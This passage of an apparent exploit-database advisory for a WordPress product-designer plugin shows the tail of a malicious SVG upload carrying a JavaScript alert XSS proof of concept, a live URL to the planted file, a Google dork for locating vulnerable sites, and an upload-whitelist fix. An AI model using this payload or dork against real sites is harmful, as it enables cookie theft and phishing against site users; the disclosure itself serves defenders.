19 5 13 2 -7\r\n 2 -19 0 -25z m13 -78 c0 -5 -4 -10 -10 -10 -5 0 -10 5 -10 10 0 6 5 10 10 10\r\n 6 0 10 -4 10 -10z\"/>\r\n <path d=\"M2020 1111 c-24 -5 -34 -11 -32 -21 2 -8 1 -12 -3 -8 -4 4 -25 -3\r\n -46 -14 -38 -20 -39 -21 -39 -77 0 -31 -3 -66 -6 -78 -6 -23 -5 -23 85 -23\r\n l91 0 0 115 c0 63 -3 114 -7 114 -5 -1 -24 -5 -43 -8z m29 -58 c-1 -17 -3 -21\r\n -6 -10 -2 9 -9 17 -14 17 -5 0 -9 5 -9 10 0 6 7 10 15 10 10 0 15 -9 14 -27z\r\n m-39 -48 l0 -65 -30 0 c-30 0 -30 0 -30 58 0 65 3 72 37 72 22 0 23 -4 23 -65z\r\n m-83 30 c0 -8 -4 -15 -9 -15 -10 0 -11 14 -1 23 9 10 10 9 10 -8z m16 -92 c4\r\n -19 2 -33 -3 -33 -6 0 -10 1 -10 3 -10 64 -10 81 -2 72 5 -5 12 -25 15 -42z\r\n m101 15 c-4 -13 -7 -29 -7 -35 0 -7 -6 -13 -12 -13 -9 0 -9 9 -1 35 6 19 15\r\n 35 19 35 5 0 5 -10 1 -22z\"/>\r\n <path d=\"M2210 1003 l0 -113 88 0 87 0 0 111 0 110 -88 2 -87 2 0 -112z m59\r\n 75 c6 -7 22 -13 34 -13 20 0 22 -6 25 -62 l3 -63 -31 0 -30 0 0 59 c0 36 -5\r\n 63 -13 69 -20 17 -10 -118 11 -140 9 -11 11 -18 4 -18 -19 0 -30 33 -32 100\r\n -1 36 -2 68 -1 73 2 11 15 9 30 -5z m90 -53 c-1 -77 -11 -110 -32 -111 -10 -1\r\n -12 0 -3 3 27 8 36 131 11 157 -14 13 -13 15 5 13 18 -1 20 -8 19 -62z\"/>\r\n <path d=\"M2530 1115 c0 0 -1 -51 -3 -113 l-2 -112 88 0 87 0 0 113 0 112 -85\r\n 0 c-47 0 -85 0 -85 0z m33 -67 c-7 -59 -13 -61 -13 -5 0 26 4 47 9 47 4 0 6\r\n -19 4 -42z m110 21 c-4 -15 -8 -17 -14 -8 -8 14 -3 29 11 29 4 0 6 -9 3 -21z\r\n m-33 -66 c0 -63 0 -63 -29 -63 -28 0 -29 1 -30 57 0 67 1 69 33 69 25 0 26 -2\r\n 26 -63z m34 -21 c-2 -67 -3 -72 -15 -72 -5 0 -7 5 -3 12 4 6 6 29 6 51 -2 33\r\n 3 57 11 57 1 0 1 -21 1 -48z\"/>\r\n <path d=\"M2800 1003 l0 -113 30 0 30 0 0 113 0 114 -30 0 -30 0 0 -114z m39\r\n 10 c-1 -67 -2 -67 -10 -23 -11 63 -11 90 1 90 6 0 9 -28 9 -67z\"/>\r\n <path d=\"M1870 1080 c-66 -23 -63 -23 -54 -8 4 7 3 8 -5 4 -6 -4 -9 -11 -6\r\n -15 7 -13 -65 -58 -112 -70 -23 -7 -67 -25 -98 -41 -58 -31 -95 -38 -95 -19 0\r\n 5 -4 8 -9 5 -5 -4 -22 -1 -38 5 -15 6 -40 12 -55 14 -15 2 -38 11 -52 20 -27\r\n 18 -98 33 -81 17 6 -5 36 -19 67 -32 32 -12 55 -26 52 -31 -3 -5 1 -6 9 -3 8\r\n 3 42 -4 75 -15 74 -25 109 -27 114 -5 2 9 37 30 87 50 47 19 85 33 86 31 1 -1\r\n -2 -15 -6 -32 -4 -16 -7 -22 -8 -12 -2 31 -26 13 -29 -21 -3 -30 -1 -32 27\r\n -32 31 0 31 0 32 58 l0 57 70 35 c39 19 75 41 81 47 13 16 14 16 -52 -7z\"/>\r\n <path d=\"M1180 770 c0 -5 5 -10 11 -10 5 0 7 5 4 10 -3 6 -8 10 -11 10 -2 0\r\n -4 -4 -4 -10z\"/>\r\n <path d=\"M150 634 c0 -74 4 -113 10 -109 6 3 10 26 10 50 0 44 0 44 33 39 46\r\n -7 97 26 97 63 0 50 -33 73 -104 73 l-46 0 0 -116z m111 86 c26 -14 24 -55 -3\r\n -74 -12 -9 -37 -16 -55 -16 -33 0 -33 0 -33 50 l0 50 36 0 c19 0 44 -5 55 -10z\"/>\r\n <path d=\"M562 638 c2 -69 7 -112 13 -110 6 1 10 24 10 50 0 44 2 47 24 44 13\r\n -2 44 -26 69 -53 24 -27 48 -46 53 -43 5 3 -11 26 -36 52 l-44 46 29 12 c44\r\n 19 51 61 16 91 -21 18 -39 23 -82 23 l-54 0 2 -112z m122 76 c21 -20 20 -30\r\n -4 -54 -13 -13 -33 -20 -60 -20 l-40 0 0 45 0 45 44 0 c27 0 51 -6 60 -16z\"/>\r\n <path d=\"M1023 729 c-57 -36 -67 -123 -20 -166 53 -49 105 -56 158 -20 44 29\r\n 62 81 47 131 -22 70 -118 98 -185 55z m142 -25 c38 -41 31 -116 -14 -151 -29\r\n -22 -95 -16 -125 12 -36 34 -37 105 -1 140 35 36 106 35 140 -1z\"/>\r\n <path d=\"M1521 658 c-1 -50 -7 -98 -13 -105 -6 -7 -26 -13 -45 -13 -20 0 -32\r\n -4 -28 -10 10 -17 60 -11 82 10 13 11 24 38 28 62 8 58 2 141 -12 145 -7 3\r\n -11 -27 -12 -89z\"/>\r\n <path d=\"M1830 645 c0 -58 -1 -108 -2 -112 -2 -5 32 -9 75 -11 48 -2 77 1 77\r\n 8 0 6 -27 10 -65 10 l-65 0 0 45 0 45 55 0 c30 0 55 5 55 10 0 6 -25 10 -55\r\n 10 l-55 0 0 40 0 40 65 0 c37 0 65 4 65 10 0 6 -32 10 -75 10 l-75 0 0 -105z\"/>\r\n <path d=\"M2278 734 c-32 -17 -58 -62 -58 -100 0 -61 59 -114 127 -114 29 0 83\r\n 26 83 40 0 15 -16 12 -30 -5 -15 -18 -82 -20 -112 -4 -11 6 -26 26 -34 46 -30\r\n 72 12 133 92 133 23 0 46 -4 49 -10 7 -12 35 -13 35 -2 0 30 -107 41 -152 16z\"/>\r\n <path d=\"M2660 740 c0 -5 21 -10 46 -10 l45 0 -2 -102 c-1 -69 2 -103 10 -106\r\n 8 -3 11 28 11 102 l0 106 45 0 c25 0 45 5 45 10 0 6 -40 10 -100 10 -60 0\r\n -100 -4 -100 -10z\"/>\r\n <path d=\"M481 504 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z\"/>\r\n <path d=\"M2805 381 c-24 -5 -35 -17 -57 -59 l-27 -53 -27 55 c-25 52 -30 56\r\n -62 56 l-34 0 48 -67 c40 -56 48 -75 49 -113 0 -43 1 -45 30 -45 29 0 30 1 27\r\n 43 -3 37 2 50 47 112 28 38 47 71 43 73 -4 2 -20 1 -37 -2z m-78 -163 c-3 -8\r\n -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M157 268 l2 -113 28 0 28 1 3 112 3 112 -33 0 -33 0 2 -112z\"/>\r\n <path d=\"M340 266 l0 -113 25 0 c24 0 25 2 25 62 0 43 -5 66 -15 75 -18 15\r\n -16 57 2 57 15 0 17 -13 3 -22 -5 -3 -7 -12 -3 -21 3 -8 8 -13 10 -10 3 2 27\r\n -21 55 -52 70 -79 70 -79 96 -87 22 -6 22 -6 22 109 l0 116 -25 0 c-24 0 -25\r\n -2 -25 -64 0 -53 3 -65 18 -69 14 -4 14 -5 -3 -6 -13 0 -41 24 -80 68 -40 46\r\n -68 70 -82 70 -23 1 -23 -1 -23 -113z m65 54 c-3 -5 -12 -10 -18 -10 -7 0 -6\r\n 4 3 10 19 12 23 12 15 0z m115 -115 c0 -8 -2 -15 -4 -15 -2 0 -6 7 -10 15 -3\r\n 8 -1 15 4 15 6 0 10 -7 10 -15z\"/>\r\n <path d=\"M696 355 c-30 -27 -29 -26 -17 -58 7 -17 25 -30 60 -43 54 -19 64\r\n -36 31 -54 -15 -8 -27 -7 -49 4 -26 14 -30 14 -45 -3 -15 -17 -14 -19 24 -36\r\n 52 -23 104 -12 134 28 19 26 19 30 6 54 -9 15 -33 32 -60 42 -27 10 -46 24\r\n -48 35 -3 15 3 17 49 14 43 -2 54 0 57 13 3 19 -24 29 -79 29 -25 0 -45 -8\r\n -63 -25z\"/>\r\n <path d=\"M950 268 l0 -113 82 2 c77 1 83 3 86 24 4 21 1 22 -52 16 l-56 -6 0\r\n 30 c0 28 2 29 44 29 40 0 44 2 39 21 -5 18 -11 19 -44 14 -38 -7 -39 -6 -39\r\n 24 0 31 0 31 55 31 48 0 55 2 55 20 0 18 -7 20 -85 20 l-85 0 0 -112z m37 60\r\n c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m9 -56 c-4 -26 -21 -24\r\n -22 2 -1 16 3 23 11 20 7 -3 12 -13 11 -22z\"/>\r\n <path d=\"M1260 365 c-46 -25 -67 -92 -44 -141 29 -61 103 -87 167 -60 60 24\r\n 44 54 -19 37 -68 -19 -115 29 -94 95 13 38 32 46 99 42 28 -2 45 1 48 9 11 30\r\n -110 44 -157 18z\"/>\r\n <path d=\"M1522 289 c3 -82 5 -92 28 -109 36 -28 83 -33 126 -15 55 23 63 39\r\n 64 133 l0 82 -30 0 -30 0 0 -78 c0 -85 -8 -102 -50 -102 -42 0 -50 17 -50 102\r\n l0 78 -31 0 -31 0 4 -91z m188 -69 c-6 -11 -13 -20 -16 -20 -2 0 0 9 6 20 6\r\n 11 13 20 16 20 2 0 0 -9 -6 -20z\"/>\r\n <path d=\"M1860 267 l0 -114 31 0 c30 0 31 1 27 44 -3 35 0 43 14 43 10 0 27\r\n -17 40 -39 17 -31 30 -40 57 -45 19 -3 37 -3 40 -1 2 3 -15 27 -37 54 -39 46\r\n -40 50 -22 56 26 8 40 36 33 64 -8 32 -54 51 -123 51 l-60 0 0 -113z m125 63\r\n c12 -20 -6 -47 -38 -57 l-32 -10 3 39 c4 34 7 38 32 38 16 0 32 -5 35 -10z\r\n m32 -12 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m-120 -70 c-3\r\n -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M2160 266 l0 -113 30 1 30 1 0 113 0 112 -30 0 -30 0 0 -114z m37\r\n -38 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M2320 360 c0 -17 7 -20 40 -20 l40 0 0 -93 0 -94 30 0 30 0 0 94 0\r\n 93 35 0 c28 0 35 4 35 20 0 19 -7 20 -105 20 -98 0 -105 -1 -105 -20z m110\r\n -35 c0 -5 -5 -3 -10 5 -5 8 -10 20 -10 25 0 6 5 3 10 -5 5 -8 10 -19 10 -25z\r\n m8 -56 c-3 -20 -5 -19 -9 9 -3 20 -2 29 4 23 5 -5 7 -19 5 -32z\"/>\r\n <path d=\"M818 123 c7 -3 16 -2 19 1 4 3 -2 6 -13 5 -11 0 -14 -3 -6 -6z\"/>\r\n </g>\r\n <script type=\"text/javascript\">\r\n alert(\"@insecurity\");\r\n </script>\r\n</svg>\r\n\r\n-------------------------------------------------------------------------------------------------------------\r\n\r\nHere is a live example: \r\n https://www.saltsidecreations.com/wp-content/uploads/fancy_products_uploads/2017/04/28/insecurity.svg\r\n\r\nThis could have a variety of impacts ranging from stealing cookies and regular XSS-related risks to a highly\r\neffective spear phishing campaign\r\n\r\nGoogle Dork: inurl:fancy_products_uploads\r\n\r\n-------------------------------------------------------------------------------------------------------------\r\n\r\nHow to fix: Use whitelist for file upload (e.g. only allow JPG and PNG, no .svg)\r\n\r\nThere's also multiple full path disclosure for this plugin but WP is riddled with FPD. If you're interested then \r\nget in touch (although im pretty sure there's tons of files in /wp-includes/ that will give you FPD anyway presuming no error_reporting(0) set)\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27710"}]}}
